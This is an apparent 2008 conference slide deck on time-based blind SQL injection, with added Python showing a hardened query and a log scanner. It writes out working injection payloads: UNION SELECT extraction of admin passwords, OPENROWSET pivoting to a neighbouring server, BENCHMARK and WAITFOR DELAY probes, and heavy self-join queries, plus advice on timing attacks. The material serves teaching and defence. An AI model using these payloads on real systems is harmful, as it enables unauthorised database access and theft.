Time based SQL Injection, presented by Muhaimin Dzulfakar. © 2008 Security-Assessment.com
Who am I
Muhaimin Dzulfakar – 90% of kiwis can't pronounce it
Known as 'Emmie'
Security Consultant – Security-Assessment.com
Application and network pen-tester
Agenda
What is time based SQL Injection
Differences between blind and time based SQL Injection
Time based injection with heavy queries
Limitation of time based SQL Injection
Different types of SQL Injection
In Band Injection
Out of Band Injection
Blind SQL Injection
Time Based SQL Injection
In Band Injection
Results are embedded in the page via UNION SELECT
Useful when the SQL error message is displayed
Fastest way to extract data
Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null FROM admin/*
Out of Band Injection
Uses a different communication channel to drill for data
Ex: a web mail application in which data received via SMTP is processed
Example of attack: accessing a neighbouring database server with OOB injection
Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--
Out of Band Injection
[Diagram: the web server www.buyviagra.com queries Database A; the OOB injection makes Database A open a connection to Database B at 10.1.1.1]
Blind SQL Injection
The application generates a custom error message for a failed response and the normal page for a successful response
The attacker compares the true and false responses
AND 1=1 -> true
AND 1=2 -> false
Data is read byte by byte
Time Based SQL Injection
Uses a time delay, rather than page content, to tell a true response from a false one
For a true response, the time delay is executed
For a false response, the time delay is not executed
Data is read byte by byte, exactly the same method as blind injection
First example in Chris Anley's paper, More Advanced SQL Injection
Another example in David Litchfield's paper, Data Mining with SQL Injection and Inference
Why we need Time Based SQL Injection
When the application generates the default page for both the true and the false response
When the application generates the same custom error page for both the true and the false response
The injection succeeds, but its result cannot be seen by the attacker
Scenario 1 (blind injection attack)
$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
}
SQL statement
1 AND 1=1 [TRUE] -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILED
Scenario 1 (time based blind injection attack)
$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
}
SQL statement
1 AND 1=1 [TRUE] -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond
TIME BASED BLIND INJECTION SUCCESS
Scenario 2 (blind injection attack)
$values = 1 to 20
if the $values are not between 1-20
{
    redirect user to error.php
}
SQL statement
1 AND 1=1 [TRUE] -> error page displayed
1 AND 1=2 [FALSE] -> error page displayed
BLIND INJECTION FAILED
Scenario 2 (time based blind injection attack)
$values = 1 to 20
if the $values are not between 1-20
{
    redirect user to error.php
}
SQL statement
1 AND 1=1 [TRUE] -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond
TIME BASED BLIND INJECTION SUCCESS
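The two scenarios above make one point: the page looks identical for a true and a false condition, yet the injected condition still runs inside the database. The following added example (not from the slides) reproduces Scenario 1 in Python with sqlite3, records every statement the engine actually executes, and places the vulnerable lookup beside a hardened version that parses the id as an integer, range-checks it and binds it as a parameter. The table, column names and the trace recording are assumptions made for the demonstration.

```python
import sqlite3

DEFAULT_ID = 1               # the slide's $default=1
VALID_RANGE = range(1, 21)   # ids 1-20


def make_db():
    """Constructed in-memory table with 20 pages; every executed statement is recorded."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO page VALUES (?, ?)", [(i, f"page {i}") for i in VALID_RANGE])
    executed = []
    conn.set_trace_callback(executed.append)   # audit trail of SQL as the engine runs it
    return conn, executed


def lookup_vulnerable(conn, raw_id):
    """Scenario 1 as sketched on the slide: the id is concatenated into the query, and a
    lookup that finds no row falls back to the default page (page.php?id=$default)."""
    row = conn.execute(f"SELECT title FROM page WHERE id = {raw_id}").fetchone()
    if row is None:
        row = conn.execute("SELECT title FROM page WHERE id = ?", (DEFAULT_ID,)).fetchone()
    return row[0]


def lookup_hardened(conn, raw_id):
    """Same behaviour for legitimate ids, but attacker text never reaches the SQL engine:
    strict integer parsing, a range check, and a bound parameter."""
    try:
        page_id = int(raw_id)
    except (TypeError, ValueError):
        page_id = DEFAULT_ID
    if page_id not in VALID_RANGE:
        page_id = DEFAULT_ID
    return conn.execute("SELECT title FROM page WHERE id = ?", (page_id,)).fetchone()[0]


def run_demo():
    """Feed the slide's 1 AND 1=1 / 1 AND 1=2 probes to both lookups and report, per
    lookup, the pages returned and the statements that really ran."""
    conn, executed = make_db()
    del executed[:]                                   # drop the setup statements
    report = {}
    for name, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        start = len(executed)
        pages = (fn(conn, "1 AND 1=1"), fn(conn, "1 AND 1=2"))
        report[name] = {"pages": pages, "sql": executed[start:]}
    return report
```

The vulnerable lookup returns the same page for both probes, which is exactly why the blind attack on the slide "fails", while its trace shows the injected condition was evaluated; the hardened lookup's trace contains only the bound integer.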
Spot the difference
Blind injection (for MySQL)
1 AND ASCII(substring((@@version),1,1))<52
if the first character of the database version is less than 4 (ASCII 52 is '4'), the condition is true
if the first character of the database version is 4 or more, the condition is false
(the slide's callouts label the query, the character position, the operator and the character value)
Spot the difference
Time Based Blind injection (for MySQL)
1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
if the first character of the database version is less than 4, BENCHMARK is executed and the response is delayed
if the first character of the database version is not less than 4, 1 is returned immediately
(the slide's callouts label the query, the character position, the operator, the character value, the time delay and the iteration count)
Time Based Injection on MSSQL
Time based injection (MSSQL)
1 AND if not(substring((select @@version),25,1) < 52) waitfor delay '0:0:9'--
if the first character is less than 4, waitfor delay is executed
(the slide's callouts label the query, the character position, the operator, the character value and the time delay)
Other Databases
Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions
Time Based Injection is still possible by using heavy queries
Chema Alonso and José Parada presented this in a Microsoft Security MVP article and at Defcon 2008
2 types of conditions in the 'where clause', depending on which is evaluated first:
Light condition first
Heavy condition first
Select A from B where ConditionA and ConditionB
Heavy condition first (heavy condition: 100 sec, light condition: 10 sec)
Heavy    Light    Result    Time
False    -        False     100 seconds
True     True     True      110 seconds
True     False    False     110 seconds
Result from Alonso's research
Light condition first (heavy condition: 100 sec, light condition: 10 sec)
Light    Heavy    Result    Time
False    -        False     10 seconds
True     True     True      110 seconds
True     False    False     110 seconds
Result from Alonso's research
Heavy Queries
Oracle evaluates the conditions from left to right
MS Access evaluates the conditions from right to left
MSSQL evaluates the light condition first
The table name needs to be known
A default table can be used for testing:
MSSQL – sysusers
MySQL – information_schema.columns
Oracle – all_users
Heavy Queries
Example of time based injection using heavy queries on MSSQL (the light condition is evaluated first)
1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8) > 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
The first subquery is the heavy query (an eight-way self-join of sysusers); the second is the light query
Suitable for databases that do not support time delay functions
Ex: Oracle and MS Access
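From the defender's side, the delay primitives and heavy-query shapes shown on these slides are the most recognisable part of a time-based attack. The following added example (not from the slides or from Security-Assessment.com) scans constructed web access log lines for them: BENCHMARK/SLEEP/WAITFOR DELAY, the ASCII(SUBSTRING(...)) inference pattern, and a default table joined to itself several times, and raises confidence when the matching request was also slow. The log format, the three-reference threshold and the 3000 ms cut-off are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the delay primitives and the inference pattern used on the slides.
SIGNATURES = {
    "mysql_benchmark": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
    "mysql_sleep": re.compile(r"\bSLEEP\s*\(\s*\d", re.I),
    "mssql_waitfor": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "char_inference": re.compile(r"\bASCII\s*\(\s*SUBSTR(?:ING)?\s*\(", re.I),
}
# Heavy queries join a default table to itself many times; 3+ references is the (assumed) threshold.
DEFAULT_TABLES = re.compile(r"\b(?:sysusers|all_users|information_schema\.columns)\b", re.I)
HEAVY_JOIN_THRESHOLD = 3

# Constructed log format (not any real server's): ip [time] "METHOD url" status response_ms
LOG_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3}) (?P<ms>\d+)$')


def classify_url(url):
    """Return the set of indicator names found in any URL-decoded query parameter value."""
    found = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        found.update(name for name, rx in SIGNATURES.items() if rx.search(value))
        if len(DEFAULT_TABLES.findall(value)) >= HEAVY_JOIN_THRESHOLD:
            found.add("heavy_self_join")
    return found


def scan_log(lines, slow_ms=3000):
    """One finding per request carrying an indicator; a slow response raises the confidence,
    since a delay that actually fired means the injected condition was evaluated."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line: skip rather than guess
        indicators = classify_url(m["url"])
        if indicators:
            ms = int(m["ms"])
            findings.append({"ip": m["ip"], "indicators": sorted(indicators), "response_ms": ms,
                             "confidence": "high" if ms >= slow_ms else "medium"})
    return findings


# Constructed sample log: one benign request, then the slides' MySQL, MSSQL and heavy-query probes.
SAMPLE_LOG = [
    '203.0.113.5 [12/Mar/2008:03:02:11 +1300] "GET /buy.php?id=7" 200 41',
    '198.51.100.9 [12/Mar/2008:03:02:14 +1300] "GET /buy.php?id=1+AND+(SELECT+IF((ASCII(SUBSTRING((SELECT+@@version),1,1))<52),BENCHMARK(900000,SHA1(1)),1))" 200 5120',
    '198.51.100.9 [12/Mar/2008:03:02:20 +1300] "GET /buy.asp?id=1+AND+if+not(substring((select+@@version),25,1)<52)+waitfor+delay+%270:0:9%27--" 200 9031',
    '198.51.100.9 [12/Mar/2008:03:02:31 +1300] "GET /buy.asp?id=1+AND+(select+count(*)+FROM+sysusers+as+s1,sysusers+as+s2,sysusers+as+s3)>0" 200 1450',
]
```

Because the heavy-query probe carries no delay keyword at all, the self-join count is what catches it; the response-time check is what separates a probe that worked from one that did not.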
Limitation
Results are unreliable when the server is busy
How to get reliable results?
Review the IP ID check (hping3) to gauge server load
Perform the test at 3am
Perform the test during Xmas
For heavy queries, the time delay depends on how much data is stored in the database
The more data, the more reliable the result